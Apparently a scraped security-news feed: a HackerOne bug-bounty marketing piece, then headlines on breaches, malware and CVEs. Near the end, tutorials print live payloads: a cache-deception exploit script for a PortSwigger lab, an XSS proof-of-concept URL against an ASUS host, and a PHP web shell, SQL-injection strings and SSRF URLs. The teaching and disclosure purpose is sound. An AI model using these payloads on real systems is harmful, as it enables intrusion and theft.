fear of potential vulnerabilities in new technologies can lead to resistance against adopting innovative solutions, leaving organizations behind in security advancements. Ultimately, FUD fosters a reactive rather than proactive security posture, where organizations respond to threats as they arise instead of preparing for and mitigating potential risks. To overcome these challenges, it is crucial to cultivate a culture of trust, transparency, and collaboration, replacing FUD with informed, strategic decision-making to enhance the overall security posture.Combatting FUD: The HackerOne Journey HackerOne’s solution effectively crushes FUD by guiding customers through a comprehensive security journey. It begins with penetration testing (pentest) to identify and report initial vulnerabilities, providing a clear understanding of potential threats. Following this, we implement a Vulnerability Disclosure Program (VDP), which serves as a public channel for ethical hackers to submit bugs, ensuring continuous monitoring and improvement. The journey then progresses to a private Bug Bounty Program, incentivizing ethical hackers to uncover more critical and impactful vulnerabilities within your product. This holistic approach not only enhances your security posture but also addresses and mitigates common sources of customer FUD by fostering transparency, collaboration, and proactive risk management.Researching Crowd-Sourced Vulnerability TestingWhat is a VDP and a BBP?VDP (Vulnerability Disclosure Program): A VDP is a public intake process intended to give ethical hackers directions on how and where to report a vulnerability in an organization’s systems. It ensures that vulnerabilities are identified and mitigated before they can be exploited. VDPs are often called the “see something, say something” safey net of the internet. BBP (Bug Bounty Program): A BBP is similar to a VDP but offers monetary rewards to ethical hackers who identify and report security flaws in an organization’s digital assets. This incentivizes more thorough testing and timely disclosure of vulnerabilities. BBPs have the option to be private or public, where you can choose which will work best for you.What is Hacker-Powered Testing?Hacker-powered testing leverages a global community of skilled security researchers to identify vulnerabilities in organizations’ systems. By tapping into the collective expertise of ethical hackers, organizations can uncover security flaws that might go unnoticed by traditional security assessments.Why Add Crowd-Sourced Testing to Your Security Posture?Broader Coverage: Access a diverse pool of researchers with varied expertise.Continuous Improvement: Ongoing testing and feedback help maintain a robust security posture.Cost-Effective: Pay for valid vulnerability reports, reducing overall security costs.Enhanced Innovation: Leverage innovative approaches from the hacker community to discover unique vulnerabilities.Getting Organizational Buy-in for Bug Bounty and VDPBefore diving into crowd-sourced testing, it’s crucial to get buy-in from key stakeholders within your organization:TeamMethod of SocializationEngineeringHighlight the benefits of receiving detailed, actionable reports from skilled hackers, which can streamline the remediation process.LeadershipEmphasize the strategic advantages, such as meeting compliance requirements and showcasing a proactive security stance to stakeholders.Security TeamDiscuss how crowd-sourced testing complements existing security measures, providing an additional layer of defense.Starting with a Hacker-Powered PentestKick off your journey with a Hacker-Powered Pentest:Clear Compliance Needs: Ensure your organization meets regulatory requirements by identifying and mitigating vulnerabilities.Dip Your Feet into Ethical Hacking: Gain firsthand experience working with ethical hackers in a controlled environment.Report to Leadership: Share the positive results and insights gained from the pentest to build support for further testing.Make the Case for Additional Testing: Use the success of the initial pentest to advocate for more extensive crowd-sourced testing programs.Building Up to a Public VDPOnce you’ve established initial trust and familiarity with the hacker community, transition to a Public VDP:General Attack Surface Coverage: Broaden the scope of testing to include all publicly accessible assets.Responsible Disclosure: Provide a formal channel for hackers to report vulnerabilities responsibly.Community Interaction: Learn to engage with the hacker community and address their findings effectively.Cost-Effective Discovery: Identify low-hanging fruit at a lower cost than traditional methods.Running a HackerOne ChallengeIn parallel, run a HackerOne Challenge to stress-test specific assets:Targeted Testing: Focus on a particular asset or feature during a time-bound event.Security Maturity Assessment: Evaluate the security readiness of assets before wider testing.Cost Reduction: Identify and fix vulnerabilities pre-deployment, reducing overall bounty payments.Build Familiarity: Develop rapport with a group of hackers and learn best practices for running a successful program.Initiating a Private Ongoing Bug Bounty ProgramTransition to a Private Bug Bounty Program for continuous coverage:Ongoing Monitoring: Maintain regular security assessments of your assets.Flexibility: Adapt the scope of testing based on evolving security needs.Incentivized Testing: Engage a curated group of hackers to continuously probe for vulnerabilities.Growing to a Public Bug Bounty ProgramFinally, scale up to a Public Bug Bounty Program to maximize coverage:Widest Coverage: Engage the global hacker community for the broadest possible testing.Continuous Improvement: Benefit from ongoing insights and vulnerability reports.Enhanced Reputation: Demonstrate a strong commitment to security by collaborating openly with ethical hackers.HackerOne Is the Ultimate Solution to Dismantle FUDBy methodically leveraging HackerOne’s products, organizations can systematically dismantle Fear, Uncertainty, and Doubt associated with ethical hacking. Embrace crowd-sourced testing, build internal support, and scale your security efforts to create a robust, proactive defense against cyber threats. Together, we can create a safer digital world. To learn more, contact the expert team at HackerOne today. Excerpt FUD can overshadow proactive collaboration with ethical hackers. Let''s explore how to combat FUD and get organizational buy-in for bug bounty and VDP. Main Image
by HackerOne
2024-09-03 11:07:15
Taiwan Accuses China of 'Poaching'' Talent From Its Tech FirmsTaiwan alleges that Chinese companies are illegally recruiting talent and stealing trade secrets.
by ITPro Today
2024-09-03 11:00:24
A deep dive into the most interesting incident response cases of last yearKaspersky Global Emergency Response Team (GERT) shares the most interesting IR cases for the year 2023: insider attacks, ToddyCat-like APT, Flax Typhoon and more.
by Securelist
2024-09-03 11:00:00
The US Navy Is Going All In on StarlinkThe Navy is testing out the Elon Musk–owned satellite constellation to provide high-speed internet access to sailors at sea. It’s part of a bigger project that’s about more than just getting online.
by WIRED Security News
2024-09-03 10:52:58
Halliburton confirms data stolen in August cyberattackThe company continues to incur expenses related to the attack, but does not expect a material impact.
by Cybersecurity Dive
2024-09-03 10:23:50
Iran-linked actors ramping up cyberattacks on US critical infrastructureNation-state attacker are exploiting vulnerabilities in products from Check Point Software, Palo Alto Networks and others to attack multiple industries.
by Cybersecurity Dive
2024-09-03 09:57:44
Simone Biles & Cyber Burnout: A Shared Path to ResilienceThis year’s Olympics and Paralympic games have been a showcase of the benefits of preparedness, tenacity, and adaptability in achieving success. Olympians require all of these traits, and more, to operate at the very top of their respective disciplines. However, the psychological impact of going for gold, and carrying the expectations of fans nationwide, can […] The post Simone Biles & Cyber Burnout: A Shared Path to Resilience appeared first on IT Security Guru.
by IT Security Guru
2024-09-03 09:45:00
Migrating From VMware: Guide to a Successful TransitionNo matter your reason for transitioning from VMware, this comprehensive guide details the key migration processes and tools to consider when moving to an alternative platform.
by ITPro Today
2024-09-03 09:40:26
INSIDER THREAT AWARENESS MONTH: Are you prepared?An insider threat can feel a bit like the plot twist in a spy thriller. You know, the moment when the protagonist realises the enemy is not just at the gates but has been inside the house the whole time. Suddenly, all those polite conversations by the water cooler take on a sinister meaning. So, […] The post INSIDER THREAT AWARENESS MONTH: Are you prepared? appeared first on IT Security Guru.
by IT Security Guru
2024-09-03 09:38:54
The six most dangerous new threats security teams need to know aboutThe rise of AI presents both extraordinary opportunities and intimidating challenges in cybersecurity. While AI can easily identify and exploit vulnerabilities, deploying it without robust security measures introduces significant risks. As the technology evolves, many organisations prioritise AI innovation at the expense of security, leaving their systems vulnerable. This underscores the need for established security […] The post The six most dangerous new threats security teams need to know about appeared first on IT Security Guru.
by IT Security Guru
2024-09-03 09:31:00
New Flaws in Microsoft macOS Apps Could Allow Hackers to Gain Unrestricted AccessEight vulnerabilities have been uncovered in Microsoft applications for macOS that an adversary could exploit to gain elevated privileges or access sensitive data by circumventing the operating system''s permissions-based model, which revolves around the Transparency, Consent, and Control (TCC) framework. ""If successful, the adversary could gain any privileges already granted to the affected
by The Hacker News
2024-09-03 08:00:47
IT threat evolution in Q2 2024. Non-mobile statisticsThis report presents statistics on PC threats for Q2 2024, including data on ransomware, miners, threats to macOS and IoT devices.
by Securelist
2024-09-03 08:00:46
IT threat evolution in Q2 2024. Mobile statisticsThe report gives statistics on mobile malware and unwanted software for Q2 2024, including mobile banking Trojans and ransomware.
by Securelist
2024-09-03 08:00:08
IT threat evolution Q2 2024In this report, Kaspersky researchers explore the most significant attacks of Q2 2024 that used a XZ backdoor, the LockBit builder, ShrinkLocker ransomware, etc.
by Securelist
2024-09-03 07:28:00
Ex-Engineer Charged in Missouri for Failed $750,000 Bitcoin Extortion AttemptA 57-year-old man from the U.S. state of Missouri has been arrested in connection with a failed data extortion campaign that targeted his former employer. Daniel Rhyne of Kansas City, Missouri, has been charged with one count of extortion in relation to a threat to cause damage to a protected computer, one count of intentional damage to a protected computer, and one count of wire fraud. He was
by The Hacker News
2024-09-03 06:45:41
CVE-2024-38063: Remote Kernel Exploitation via IPv6 in WindowsOn August 13, 2024, Microsoft disclosed a critical vulnerability, CVE-2024-38063, as part of its Patch Tuesday updates [1], [2]. This vulnerability affects the TCP/IP protocol, a fundamental communication protocol used for connecting devices on the Internet and enabling services like the World Wide Web and email. With a CVSS score of 9.8 (Critical), this vulnerability is considered critical because it can be exploited remotely and has the potential to be ""wormable,"" meaning it could spread across networks without requiring user interaction. CVE-2024-38063 specifically allows attackers to execute arbitrary code remotely (RCE) on systems that have IPv6 enabled, which is the default setting on affected systems. This vulnerability impacts a wide range of Windows operating systems, including Windows 10, Windows 11, and Windows Server versions from 2008 through 2022. Organizations are strongly advised to update their systems immediately to prevent the risk of exploitation.
by Picus Security
2024-09-03 00:00:00
When on Workstation, Do as the Local Browsers Do!<p>1 IntroductionWeb browsers are common targets for many different APTs. Tools like Redline Malware or penetration testing tools such as SharpChrome or SharpChromium steal sensitive data like cookies and saved login…</p>
by TrustedSec
2024-09-02 23:00:00
Making progress on routing security: the new White House roadmapOn September 3, 2024, the White House published a report on Internet routing security. We’ll talk about what that means and how you can help.
by Cloudflare
2024-09-02 22:21:34
Introducing Goffloader: A Pure Go Implementation of an In-Memory COFFLoader and PE LoaderWe are excited to announce the release of Goffloader, a pure Go implementation of an in-memory COFFLoader and PE loader. This tool is designed to facilitate the easy execution of Cobalt Strike BOFs and unmanaged PE files directly in memory without writing any files to disk. Goffloader aims to take functionality that is conventionally within […] The post Introducing Goffloader: A Pure Go Implementation of an In-Memory COFFLoader and PE Loader appeared first on Praetorian.
by Praetorian
2024-09-02 21:31:55
Election security: how companies and federal agencies can protect the backbone of democracyRealistic workforce exercises are key to implementing predictive defensive operations, raising the cost of adversaries to target and exploit vital infrastructures.
by Hack The Box Blog
2024-09-02 20:50:42
Industry Moves for the week of September 2, 2024 - SecurityWeekExplore industry moves and significant changes in the industry for the week of September 2, 2024. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2024-09-02 19:03:00
RansomHub Ransomware Group Targets 210 Victims Across Critical SectorsThreat actors linked to the RansomHub ransomware group encrypted and exfiltrated data from at least 210 victims since its inception in February 2024, the U.S. government said. The victims span various sectors, including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services,
by The Hacker News
2024-09-02 16:46:35
Owners of 1-Time Passcode Theft Service Plead GuiltyThree men in the United Kingdom have pleaded guilty to operating otp[.]agency, a once popular online service that helped attackers intercept the one-time passcodes (OTPs) that many websites require as a second authentication factor in addition to passwords. Launched in November 2019, OTP Agency was a service for intercepting one-time passwords needed to log in to various websites. Scammers would enter the target’s phone number and name, and the service would initiate an automated phone call to the target that alerts them about unauthorized activity on their account.
by Krebs on Security
2024-09-02 16:17:24
Broadcom Unveils Major Updates to VMware Portfolio at Explore 2024Broadcom is refocusing VMware as a private cloud technology, updating the company''s core platforms for application delivery.
by ITPro Today
2024-09-02 15:44:30
Rise of Atomic Stealer signals a sea change in macOS malwareAtomic Stealer is the most popular malware-as-a-service on macOS because of highly active affiliate-driven distribution campaigns and constant feature upgrades.
by ThreatDown
2024-09-02 14:25:00
Webinar: Learn to Boost Cybersecurity with AI-Powered Vulnerability ManagementThe world of cybersecurity is in a constant state of flux. New vulnerabilities emerge daily, and attackers are becoming more sophisticated. In this high-stakes game, security leaders need every advantage they can get. That''s where Artificial Intelligence (AI) comes in. AI isn''t just a buzzword; it''s a game-changer for vulnerability management. AI is poised to revolutionize vulnerability
by The Hacker News
2024-09-02 14:18:34
🍯 Bee-side 186 - Future-Proof Your Career in the Age of AGI3 Bad Habits Holding You Back from Financial Freedom, Best Things at DEF CON 32, and more...
by Hive Five
2024-09-02 14:00:00
CrowdStrike faces onslaught of legal action from faulty software updateEven before Delta came forward, shareholders were looking for their pound of flesh, filing a class action lawsuit against CrowdStrike. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-09-02 13:00:00
Your Money or Your Data: Ransomware Readiness PlanningToday’s blog installment brings us to the end of our 30-week journey that covered 30 cybersecurity topics that I felt would be of interest to a wide variety of security practitioners, such as Security Architects, Security Admins, and Security Auditors. I hope everyone found it as helpful as I found it to write.
by SpiderLabs Blog
2024-09-02 12:46:00
For Windows 11 setup, which user account type should you choose? How to decideWhen you set up a new Windows PC, you can choose from up to four types of user accounts - but your first choice might not be the right one.
by ZDNET Security
2024-09-02 12:30:00
Next-Generation Attacks, Same Targets - How to Protect Your Users' IdentitiesThe FBI and CISA Issue Joint Advisory on New Threats and How to Stop Ransomware Note: on August 29, the FBI and CISA issued a joint advisory as part of their ongoing #StopRansomware effort to help organizations protect against ransomware. The latest advisory, AA24-242A, describes a new cybercriminal group and its attack methods. It also details three important actions to take today to mitigate
by The Hacker News
2024-09-02 11:52:57
Uncovering Critical Defensive Gaps with Automated Penetration Testing SoftwareHave you ever noticed that even the most impactful breaches often start with something as simple as a regular user being targeted through a phishing email or a weak password? From there, attackers methodically follow an attack path by dumping credentials, moving laterally across the network, escalating privileges, and eventually gaining domain administrator access. In other words, rather than relying on an extremely sophisticated single-shot technique, these attacks unfold like a domino effect, where each step paves the way for the next, leading to a full-scale compromise. This is precisely the kind of attack chain that Picus Attack Path Validation (APV), a cutting-edge automated penetration testing software, is designed to expose and validate, ensuring that these security vulnerabilities are identified before they can be exploited.
by Picus Security
2024-09-02 10:58:51
2nd September – Threat Intelligence ReportFor the latest discoveries in cyber research for the week of 26th August, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES California-based Patelco Credit Union has confirmed a data breach following a ransomware attack resulted in the exposure of sensitive personal information belongs to 726K clients and employees. The compromised data includes names, […] The post 2nd September – Threat Intelligence Report appeared first on Check Point Research.
by Check Point Research
2024-09-02 10:00:38
Spoofed GlobalProtect Used to Deliver Unique WikiLoader VariantUnit 42 discusses WikiLoader malware spoofing GlobalProtect VPN, detailing evasion techniques, malicious URLs, and mitigation strategies. The post Spoofed GlobalProtect Used to Deliver Unique WikiLoader Variant appeared first on Unit 42.
by Palo Alto Networks - Unit42
2024-09-02 10:00:22
Head Mare: adventures of a unicorn in Russia and BelarusAnalysis of the hacktivist group Head Mare targeting companies in Russia and Belarus: exploitation of WinRAR vulnerability, custom tools PhantomDL and PhantomCore.
by Securelist
2024-09-02 09:17:30
Myths and superstitions in the digital world | Kaspersky official blogEven in 2024, the world is rife with digital paranoia and superstition. Find out if your smartphone really is spying on you, and why incognito mode doesn’t make you invisible.
by Kaspersky
2024-09-02 09:06:00
Malicious npm Packages Mimicking 'noblox.js'' Compromise Roblox Developers’ SystemsRoblox developers are the target of a persistent campaign that seeks to compromise systems through bogus npm packages, once again underscoring how threat actors continue to exploit the trust in the open-source ecosystem to deliver malware. ""By mimicking the popular ''noblox.js'' library, attackers have published dozens of packages designed to steal sensitive data and compromise systems,"" Checkmarx
by The Hacker News
2024-09-02 09:05:00
The Gen Z Guide to Getting Ahead at WorkThe evolving world of work can make it hard for young professionals in their first jobs. Here are expert tips to help you succeed.
by ITPro Today
2024-09-02 09:00:00
Embracing Neurodiversity in IT Workplace to Bridge Talent GapsLeveraging the unique skills of neurodiverse individuals can help fill critical talent gaps in the workforce, particularly in IT, by fostering inclusive workplaces that recognize and support diverse cognitive abilities.
by ITPro Today
2024-09-02 08:12:41
A week in security (August 26 – September 1)A list of topics we covered in the week of August 26 to September 1 of 2024
by Malwarebytes Labs
2024-09-02 01:00:00
Ransomware Gangs Pummel Southeast AsiaSuccessful ransomware attacks against organizations in Asia continue at peak levels in 2024 following a wave of high-profile data breaches last year.
by Dark Reading
2024-09-01 19:12:28
Writeup: Path mapping for web cache deception @ PortSwigger AcademyAPPRENTICE-LABBefore starting, configure FoxyProxy to intercept requests through Burp Suite. Ensure that ‘Intercept’ is turned off in Burp Suite while FoxyProxy is active, so that all requests are logged in the HTTP history. Then, log in to the application using the credentials wiener:peter.Please note that the response will include your API key.LoginGo to Burpuite Proxy > HTTP history, right-click the GET /my-account request and select Send to Repeater.HTTP historyNavigate to the Repeater tab. Modify the base path by adding an arbitrary segment; for example, change the path to /my-account/hanzala. Send the request and observe that you still receive a response containing your API key. This indicates that the origin server abstracts the URL path to /my-account. Additionally, ensure that you receive a 200 response and verify that the request is not cachedRepeater TabAdd a static extension to the URL path, such as /my-account/hanzala.js, and send the request.Observe the response headers for X-Cache: miss and Cache-Control: max-age=30. For example:X-Cache: miss – This indicates that the response was not served from the cache.Cache-Control: max-age=30 – This specifies that if the response were cached, it should be stored for 30 seconds.extension cacheResend the request within 30 seconds. You should notice that the X-Cache header changes to hit, indicating that the response was served from the cache. This suggests that the cache interprets the URL path with the .js extension and has a caching rule for it.cache hitSo Now we Know that our request is cache lets create the exploit.In browser, click Go to exploit server.In the Body section, craft an exploit that navigates the victim user carlos to the malicious URL that you crafted earlier. Make sure to change the arbitrary path segment you added, so the victim doesn’t receive your previously cached response.Click Deliver exploit to victim. When the victim views the exploit, the response they receive is stored in the cache.<script>document.location="https://YOUR-LAB-ID.web-security-academy.net/my-account/hanzalaa.js"</script>exploitNow in Burp Suite, change the path to /my-account/hanzalaa.js. Since Carlos''s response is stored in the server cache, this request will return the same response. Send the request to retrieve Carlos''s API key. Copy it.Carlos APIClick Submit solution, then submit the API key for carlos to solve the lab.SolvedWe are done great job everyone! 👏Writeup: Path mapping for web cache deception @ PortSwigger Academy was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-09-01 19:12:09
A Story About How I Found XSS in ASUSA few months ago, during a routine security assessment, I uncovered a significant cross-site scripting (XSS) vulnerability in the ASUS Laravel Ignition debugging tool. This vulnerability, identified as R-XSS, posed a high risk due to the potential for unauthorized script execution in users’ browsers. Here’s how I discovered and explored this vulnerability.The DiscoveryWhile examining the target, I noticed that the Laravel Ignition debug mode was enabled on adam.asus.com, and the endpoint was vulnerable to XSS. The vulnerability was exposed through the following URL:Vulnerable URL: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert(''cappriciosec.com'')%3EWhen accessing this URL, the embedded script was executed in the user’s browser, confirming the presence of an XSS vulnerability.Understanding the VulnerabilityBug Name: R-XSSBug Priority: HighVulnerable URL: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert(''cappriciosec.com'')%3EImpactThe impact of this XSS vulnerability depends on the application’s context and the privileges of the compromised user. For example:Minimal Impact: In applications with public information, the impact might be negligible.Serious Impact: In applications handling sensitive data, such as financial transactions or healthcare records, the impact could be severe, allowing unauthorized access to private information.Critical Impact: If a user with elevated privileges is compromised, the attacker could gain full control of the application, affecting all users and data.Steps to ReproduceTo confirm the vulnerability, follow these steps:Access the Vulnerable URL: Open the URL in your browser: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert(''cappriciosec.com'')%3EObserve the Script Execution: The script will execute in your browser, displaying an alert with the text cappriciosec.com.Automating the HuntTo streamline the process, I built a Python tool specifically for detecting this vulnerability. You can install it using pip and automate your testing:ToolPOC: laravel-ignition-rxss on githubpip install laravel-ignition-rxss laravel-ignition-rxss --chatid <YourTelegramChatID>To Check a Single URL:laravel-ignition-rxss -u http://mytargetprogram.comTo Check a List of URLs:laravel-ignition-rxss -i urls.txtRemediationTo mitigate this vulnerability, it is essential to disable debug mode by setting APP_DEBUG to false in the environment configuration. This will prevent unauthorized script execution and protect users from potential XSS attacks.POC by: @karthithehackerMail: contact@karthithehacker.comWebsite: https://www.karthithehacker.com/If you’re interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.For enrolling my cybersecurity and Bugbounty course,WhatsApp +91 82709 13635.Connect with me:Twitter: https://twitter.com/karthithehackerInstagram: https://www.instagram.com/karthithehacker/LinkedIn: https://www.linkedin.com/in/karthikeyan--v/Website: https://www.karthithehacker.com/Github : https://github.com/karthi-the-hacker/npmjs: https://www.npmjs.com/~karthithehackerYoutube: https://www.youtube.com/@karthi_the_hackerThank youKarthikeyan.VA Story About How I Found XSS in ASUS was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-09-01 19:12:07
What is /etc/passwd group shadow file in LinuxPasswd is a file where information related to the user is stored such as name, user id, group id,gecos field, home directory, and command…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-09-01 19:12:03
Understanding the Dark Web: Myths vs. RealityUnderstanding the Dark Web: Myths vs. RealityContinue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-09-01 19:11:58
Unicast, Multicast, and Broadcast: Mastering Network Communication Essentials for Optimal…Update on meContinue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-09-01 19:11:55
AI-Driven Ghostwriter: The 2024 Ransomware That Knows You Better Than You Know YourselfProblem:Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-09-01 19:11:47
How to Get Started in Bug Bounty Hunting: A Comprehensive Beginner’s GuideIntroductionWelcome to the thrilling world of bug bounty hunting — where finding glitches in software is not just a hobby but a gateway to potential riches and recognition! Imagine being a digital detective, solving mysteries that most folks wouldn’t even notice, and getting rewarded for it. In this guide, we’ll unravel the basics of bug bounty hunting, give you a step-by-step walkthrough of unearthing common vulnerabilities, and share some nifty resources to get you started. Buckle up, it’s going to be a bug-tastic ride!What is Bug Bounty Hunting?Bug bounty hunting is like being a superhero in the realm of cybersecurity, but without the flashy suit. It involves sniffing out and reporting security vulnerabilities in systems, apps, or websites. Companies run bug bounty programs to lure ethical hackers (like you) into spotting and reporting these weak spots, which helps them beef up their security. In return, you get rewards, recognition, or at least a virtual high-five from the tech community.Step 1: Learn the Basics of Web SecurityBefore you start hunting bugs, you need to get comfy with the basics of web security. Think of it as learning the ABCs of cyber sleuthing.HTTP & HTTPS: These are like the postal services of the web. HTTP is the standard protocol, while HTTPS is its secure cousin that encrypts data between the browser and the server. Always go for HTTPS — it’s like wearing a seatbelt on the web.OWASP Top 10: This is your cheat sheet to the top 10 web security risks. Familiarize yourself with these troublemakers:SQL Injection (SQLi): When hackers play with your database like it’s a toy.Cross-Site Scripting (XSS): When bad scripts crash the party on your website.Broken Authentication: When your login system is as secure as a paper lock.Sensitive Data Exposure: When your private info goes public like it’s on a billboard.XML External Entities (XXE): When your XML files are sneaky troublemakers.Broken Access Control: When users access more than they should, like breaking into the VIP section.Security Misconfiguration: When your security settings are as mixed up as a puzzle.Cross-Site Request Forgery (CSRF): When attackers make your site do things it shouldn’t.Insecure Deserialization: When data being processed gets all messed up.Using Components with Known Vulnerabilities: When using outdated parts is like bringing a leaky bucket to the party.Networking Basics: Learn how IP addresses, DNS, and data travel over networks. It’s like understanding how letters get to your mailbox, but with a lot more technical mumbo jumbo.Step 2: Get Familiar with Tools of the TradeEvery superhero needs their gadgets, and for bug bounty hunting, you’ve got some cool tools:Burp Suite: Think of it as your magnifying glass for HTTP requests and responses. It’s powerful and comes in a community edition if you’re just starting out. Check out the Burp Suite Community Edition and Burp Suite Tutorial for Beginners.Nmap: Your go-to tool for scanning networks and discovering open ports. It’s like your radar for finding weak spots. Explore the Nmap Official Site and Nmap Tutorial for Beginners.OWASP ZAP: An open-source security scanner that helps you spot vulnerabilities. It’s like having a sidekick that never sleeps. Check out the OWASP ZAP Official Site and the OWASP ZAP User Guide.Google Dorking: Use advanced search operators to dig up information exposed on the internet. It’s like using a super-powered search engine to find hidden gems. Read up on Google Dorking Guide.Step 3: Choose a Bug Bounty PlatformNow, where do you actually hunt these bugs? Here are some platforms where you can get started:HackerOne: The big leagues with programs from major companies. Check out HackerOne and their Beginner’s Guide.Bugcrowd: Another top platform with various programs to explore. Visit Bugcrowd and Bugcrowd University.Synack: A more exclusive platform with an application process. Head over to Synack if you’re feeling fancy.Open Bug Bounty: Focuses on responsible disclosure even if you don’t have a formal program. Check out Open Bug Bounty.Step 4: Finding Vulnerabilities — Step-by-Step ExamplesLet’s put on our detective hats and dive into some classic vulnerabilities:Example 1: Cross-Site Scripting (XSS)XSS is like a prankster who injects malicious scripts into web pages. Here’s how to catch them:Identify Input Fields: Look for places where you can type stuff — search boxes, comment sections, or profiles.Inject Test Script: Drop a simple script like:<script>alert(''XSS'')</script>into the input field and hit submit.Check for Execution: If you see an alert box popping up, you’ve found an XSS vulnerability. Congrats!Report the Vulnerability: Describe your findings in a report — explain how you did it, the impact, and offer suggestions for fixing it. It’s like writing a detective’s report.Example: Testing a search fieldEnter <script>alert(''Test'')</script> in the search box.If an alert box appears, it’s an XSS vulnerability.Example 2: Remote Code Execution (RCE)RCE is when hackers can run commands on a server from afar. Here’s how to find it:Find User Input: Look for places where users can upload files or enter commands.Test File Uploads: Upload a file with an extension for executable code, like .php or .asp. Try this payload:<?php system($_GET[''cmd'']); ?>Execute Command: Access the uploaded file via the web and pass a command using URL parameters. For example: http://example.com/uploads/yourfile.php?cmd=lsObserve Output: If the command runs and you see the output, the server is vulnerable to RCE.Report the Vulnerability: Detail how you uploaded the file, executed the command, and the potential impacts.Example: Upload a PHP fileUpload a file named shell.php with the content <?php phpinfo(); ?>.Access it via http://example.com/uploads/shell.php to see if it executes.Example 3: Server-Side Request Forgery (SSRF)SSRF is when an attacker tricks the server into making requests to internal resources. Here’s how to sniff it out:Identify URL Parameters: Look for parameters that accept URLs or IP addresses.Inject Malicious URL: Test with URLs pointing to internal resources, like:http://localhost/admin http://127.0.0.1Observe Response: Check if the server returns data from the internal URL.Report the Vulnerability: Explain how you injected the URL, the responses you observed, and potential impacts.Example: Manipulate a URL parameterChange a parameter like http://example.com/fetch?url=http://localhost to other internal addresses.Example 4: SQL Injection (SQLi)SQL Injection (SQLi) involves injecting malicious SQL queries into an application to manipulate the database. Here’s how to test for SQLi:Identify Input Fields: Find fields where you can input data that interacts with a database, such as login forms or search bars.Inject SQL Payload: Use SQL injection payloads to test the input fields. For example:'' OR ''1''=''1Observe Response: If the application returns unexpected results or database errors, it may be vulnerable to SQLi.Report the Vulnerability: Provide details of the injection, the responses, and potential impacts.Example: Testing a login form:Enter admin'' OR ''1''=''1 as the username and password. If it logs you in, the site is vulnerable.Step 5: Learn From the CommunityEngaging with the bug bounty community can enhance your skills and knowledge:Write-Ups: Reading write-ups from experienced hunters can provide insights into different techniques and approaches. Websites like Hack The Box Write-Ups offer valuable information.Forums and Discord Channels: Join forums and Discord channels for bug bounty hunters. These platforms are great for asking questions and sharing knowledge.Bugcrowd ForumHackerOne CommunityBlogs and Videos: Follow cybersecurity blogs and YouTube channels for updates and tutorials.Security WeeklyThe Bug Bounty HubLiveOverflow’s YouTube ChannelAdditional Tips for Bug Bounty HuntingUnderstand the Scope: Each bug bounty program has a defined scope that specifies which applications, domains, or functionalities are in scope for testing. Always read and follow the program’s rules to avoid testing unauthorized areas.HackerOne Scope Policy2. Stay Updated: The cybersecurity landscape is always evolving. Keep up with the latest vulnerabilities, tools, and techniques by following industry news and updates.CVE DetailsExploit Database3. Practice Ethically: Always use your skills responsibly. Respect the rules of each bug bounty program and avoid causing harm to systems or users.4. Document Everything: Keep detailed records of your findings, including the steps to reproduce the vulnerability, the impact, and any mitigation advice. This will help you write better reports and communicate effectively with program managers.5. Use Automation Wisely: While automated tools can help identify vulnerabilities, manual testing is crucial for discovering complex issues. Use automation as a supplement, not a replacement for manual analysis.Example Scenarios: Bug Bounty Hunting in ActionScenario 1: Finding XSS on a Search PageStep-by-Step Example:Navigate to the Search Page: Open the search page of the target application.Test Input Fields: In the search box, input <script>alert(''XSS'')</script>.Submit and Observe: Click the search button and observe if an alert box pops up.Verify and Report: If the script executes, it indicates an XSS vulnerability. Write a report detailing the affected URL, the payload used, and the impact.Scenario 2: Exploiting RCE via File UploadStep-by-Step Example:Locate File Upload Functionality: Find a section of the application that allows file uploads, such as an avatar or document upload feature.Prepare Malicious File: Create a PHP file with the following content:<?php system($_GET[''cmd'']); ?>Upload the File: Upload the PHP file to the server.Access the File: Visit the file via URL, e.g., http://example.com/uploads/malicious.php?cmd=ls, to execute a command.Verify Execution: If you see the output of the command, the server is vulnerable to RCE. Report the issue with details on the file upload process and the commands executed.Scenario 3: Exploiting SSRF via URL ParameterStep-by-Step Example:Find URL Parameter: Look for a URL parameter in the application that accepts user input, such as a URL fetching feature.Inject Internal URLs: Enter URLs like http://localhost/admin or http://127.0.0.1 in the parameter.Check Responses: Observe if the application returns information from the internal URL or service.Report the Vulnerability: Document the URL parameter, the injected payloads, and the responses.Scenario 4: SQL Injection in Login FormStep-by-Step Example:Locate Login Form: Find the login form on the target website.Inject SQL Payload: Enter admin'' OR ''1''=''1 as both username and password.Submit the Form: Click login and see if you gain unauthorized access.Document and Report: If successful, report the SQL injection with details on the payload and its effect.Links and ResourcesLearning Platforms and TutorialsHacker101: Hacker101 — Free Online Security TrainingPortSwigger Web Security Academy: Learn Web Security for FreeBugcrowd University: Free Bug Bounty TrainingOWASP (Open Web Application Security Project): OWASP ResourcesPractice PlatformsHack The Box: Hack The Box — Practice CybersecurityTryHackMe: TryHackMe — Learn CybersecurityVulnHub: VulnHub — Vulnerable By DesignCTFtime: Capture The Flag EventsBug Bounty Programs and PlatformsHackerOne: HackerOne — Bug Bounty PlatformBugcrowd: Bugcrowd — Find and Report BugsSynack: Synack — Managed Bug BountyCobalt: Cobalt — Pentesting as a ServiceTools and ResourcesBurp Suite: Burp Suite — Web Vulnerability ScannerOWASP ZAP (Zed Attack Proxy): OWASP ZAP — Free Security ScannerNmap: Nmap — Network ScannerNikto: Nikto — Web Server ScannerLearning and CommunityThe Hacker News: Stay Updated on Security NewsKrebs on Security: Krebs on Security BlogReddit — NetSec: NetSec SubredditTwitter — Follow Security Experts: List of Security Experts on TwitterDocumentation and ReportingExploit-DB: Exploit Database — Exploits and VulnerabilitiesCVE Details: CVE Details — Vulnerability DatabaseSecurity Focus: Security Focus — 